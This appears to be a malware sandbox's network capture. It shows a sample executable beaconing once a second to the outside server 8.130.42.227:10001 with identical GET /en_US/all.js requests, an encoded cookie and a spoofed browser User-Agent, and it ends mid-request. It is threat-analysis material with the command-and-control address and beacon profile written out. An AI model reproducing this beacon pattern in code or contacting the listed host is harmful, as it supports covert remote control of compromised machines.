                                                                Date: Tue, 1 Oct 2024 07:17:50 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                43192.168.2.4497798.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:17:50.402236938 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:51.369102955 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:51 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                44192.168.2.4497808.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:17:51.481307983 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:52.431555986 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:52 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                45192.168.2.4497828.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:17:52.542958975 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:53.539417028 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:53 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                46192.168.2.4497838.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:17:53.721587896 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:54.689713955 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:54 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                47192.168.2.4497848.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:17:54.810755968 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:55.758268118 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:55 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                48192.168.2.4497858.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:17:55.871373892 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:56.837666988 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:56 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                49192.168.2.4497868.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:17:56.949346066 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:58.517384052 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:57 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0
                                                                Oct 1, 2024 09:17:58.517575026 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:57 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                50192.168.2.4497878.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:17:58.640695095 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:59.583570004 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:59 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                51192.168.2.4497888.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:17:59.699615955 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:00.651453972 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:00 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                52192.168.2.4497898.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:18:00.763720036 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:01.725831985 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:01 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                53192.168.2.4497908.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:18:01.840148926 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:02.821022034 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:02 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                54192.168.2.4497918.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:18:02.933568954 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:03.911815882 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:03 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                55192.168.2.4497928.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:18:04.027379036 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:04.981847048 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:04 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                56192.168.2.4497938.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:18:05.105262995 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:06.064009905 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:05 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                57192.168.2.4497948.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:18:06.183608055 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:07.142935991 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:06 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                58192.168.2.4497958.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:18:07.263447046 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:08.247355938 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:08 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                59192.168.2.4497968.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:18:08.355396986 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:09.322186947 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:09 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                60192.168.2.4497978.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:18:09.433604956 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:10.406157970 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:10 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                61192.168.2.4497988.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:18:10.529619932 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:11.475215912 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:11 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                62192.168.2.4497998.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:18:11.589905977 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:12.557328939 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:12 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                63192.168.2.4498008.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:18:12.669694901 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:13.613919020 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:13 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                64192.168.2.4498018.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:18:13.730804920 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:14.684660912 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:14 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                65192.168.2.4498028.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:18:14.808661938 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:15.751969099 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:15 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                66192.168.2.4498038.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:18:15.885741949 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:16.838865995 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:16 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                67192.168.2.4498048.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:18:16.949246883 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:17.902736902 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:17 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                68192.168.2.4498058.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:18:18.070692062 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:19.022764921 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:18 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                69192.168.2.4498068.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:18:19.154947042 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
